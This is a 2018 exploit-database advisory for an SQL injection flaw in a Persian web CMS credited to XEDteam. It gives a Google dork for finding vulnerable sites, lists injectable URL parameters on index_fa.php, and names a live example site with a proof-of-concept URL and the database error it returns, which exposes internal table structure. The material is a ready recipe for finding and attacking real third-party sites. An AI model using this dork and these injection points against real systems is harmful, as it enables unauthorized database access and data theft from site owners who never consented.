Powered By XEDteam راحی و توسعه: گروه زد Iran SQL Injection Vulnerability

2018.09.29
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################################################################# # Exploit Title : Powered By XEDteam راحی و توسعه: گروه زد Iran SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 28/09/2018 # Vendor Homepage : xedteam.com # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Google Dork : intext:''Powered By: XEDteam.'' intext:''طراحی و توسعه: گروه زد.'' inurl:''/index_fa.php'' Powered By: XEDteam. # Exploit : /index_fa.php?option=product&task=list&p=[SQL Injection] /index_fa.php?option=product&task=list&p=-[ID-NUMBER] &brand=&name=&feature=[SQL Injection] /index_fa.php?option=product&task=list&p=-[ID-NUMBER] &brand=&name=&feature=[ID-NUMBER]&type=&size=[SQL Injection] /index_fa.php?option=product&task=list&p=-[ID-NUMBER] &brand=&name=&feature=[ID-NUMBER]&type=&size=[ID-NUMBER]&print_type=&glaze=[SQL Injection] ################################################################################################# # Example Site => amintile.ir/index_fa.php?option=product&task=list&p=-1%27 => [ Proof of Concept ] => archive.is/v2AUm # SQL Database Error => You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near \'-15, 15\' at line 16 SQL=SELECT p.id, IF(gn.value = \'\' OR gn.value IS NULL, n.value, gn.value) AS name, p.group_id, g.value AS glaze, p.image,\n GROUP_CONCAT(DISTINCT s.width, \'x\', s.height) AS size, p.image, p.layout,\n pt.value AS print_type\n FROM smb_product AS p\n LEFT JOIN smb_translation AS n ON n.object = p.id AND n.type = \'product_name\' AND n.language = \'fa\'\n LEFT JOIN smb_translation AS gn ON gn.object = p.id AND gn.type = \'product_group_name\' AND gn.language = \'fa\'\n LEFT JOIN smb_translation AS g ON g.object = p.glaze_id AND g.type = \'glaze_name\' AND g.language = \'fa\'\n LEFT JOIN smb_translation AS pt ON pt.object = p.print_type_id AND pt.type = \'print_type_name\' AND pt.language = \'fa\'\n LEFT JOIN smb_product AS pg ON pg.group_id = p.id AND pg.group_id != 0\n LEFT JOIN smb_product_sizes AS sz ON sz.product = p.id OR (pg.id IS NOT NULL AND sz.product = pg.id)\n LEFT JOIN smb_product_size AS s ON s.id = sz.size\n LEFT JOIN smb_product_features AS f ON f.product = p.id\n WHERE 1=1 AND (p.group_id = 0 OR p.group_id = p.id)\n GROUP BY p.id\n ORDER BY p.ordering\n LIMIT -15, 15 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top